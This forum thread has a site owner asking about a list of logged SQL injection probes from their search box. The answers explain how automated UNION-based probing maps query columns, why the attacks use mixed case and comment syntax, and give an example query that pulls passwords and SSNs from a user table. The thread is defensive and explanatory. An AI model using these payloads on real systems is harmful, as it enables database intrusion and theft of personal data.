# Purpose of SQL Injection

Tags: sql-server

So we have a search field on our website, and I save all of the search terms to a database table.
I brought up the search term table today and noticed some weird searches, where it's pretty clear that someone is trying to mess around with our database.
There have been over 200 searches just today.

They seem to be variations on a theme:

```
999999.9) union all select 1 and (0=0
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) 
999999.9 union all select 1 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39-- 
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)-- 
999999.9 union all select 1-- 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0 
999999.9" union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and "0"="0 
999999.9" union all select 1 and "0"="0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0 
999999.9' union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and '0'='0 
999999.9' union all select 1 and '0'='0 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0) 
999999.9) union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and (0=0) 
999999.9) union all select 1 and (0=0) 
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
labor op99999' union select unhex(hex(version())) -- 'x'='x
labor op99999' union select unhex(hex(version())) -- 'x'='x
```

Our site search uses parameterized queries, and I've tried pasting a few of them in so I don't think they are getting anything, but I'm really curious what they are trying to get.

Answer (score 3, accepted):

> I'm really curious what they are trying to get.

At first, nothing. These are just probes. They're just trying to see your service produce an unexpected result that indicates it couldn't handle the input. There's probably not even any real person at the keyboard here; it's likely just a script trying various possibilities.

If any of the probes actually succeed, though, the nature of the attack will change, and you'll start to see attempts to do something more malicious.

I wouldn't wait for that, even if you're sure it can't happen. Check your logs to see where the attack is coming from, and, if possible, block that user or IP from ever seeing your system.

Comment: good to know. I wasn't tracking IP addresses on the search term table before this, though I am now. I'll have to see if I can find a log file that has that information, or wait for them to come back and try again I guess. Thanks!

Answer (score 2):

Submitting `union all` clauses simultaneously probes the vulnerability to injection and the structure of your queries. Using postgres (because that's what I have at hand):

```
(unknown website query)    
/**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39

ERROR:  each UNION query must have the same number of columns
LINE 2: /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
                                ^
********** Error **********

ERROR: each UNION query must have the same number of columns
```

If your website forwards this error message, I'll have learned 1) the sql injection worked, and 2) the unknown website query selects more than one column. So now I try with two columns, three columns, and so on until I get a different error message, for example:

```
ERROR:  UNION types text and integer cannot be matched
LINE 2: /**/aLl /**/sElEcT 0x393133363636353631352e39, 0
```

Now I know that sql injection works and I also know that either col_1 or col_2 of your query returned text data. Soon I'll have mapped out the points where sql injection is possible, the number of columns returned, and the datatypes of each column.

Next, I might try UNION'ing from common table names such as `user` that might store valuable information:

```
(unknown website query)    
union all select user_id, password, ssn from user
```

The hacker also appears to be checking whether comment syntax can be injected: `/**/` and `--`. This is useful because it can potentially be used to modify your queries by commenting out and replacing portions of them.

I'd guess the unusual capitalization makes it easier for the hacker to automate the process of finding vulnerabilities by searching for that unique string in the website's response. There's more going on here, and I don't understand all of it, but I hope that gives the general idea of how your site's being probed.

Comment: Odd capitalization is also used because some weak systems do naive keyword blocking. "UNION" or "union" would be blocked, but "uNion" might get through. This isn't good security, but I've seen it done, and it's not necessarily horrible if it's done _in addition to_ better options like parameterized queries, or store-procedure-only systems where the web user only has execute rights.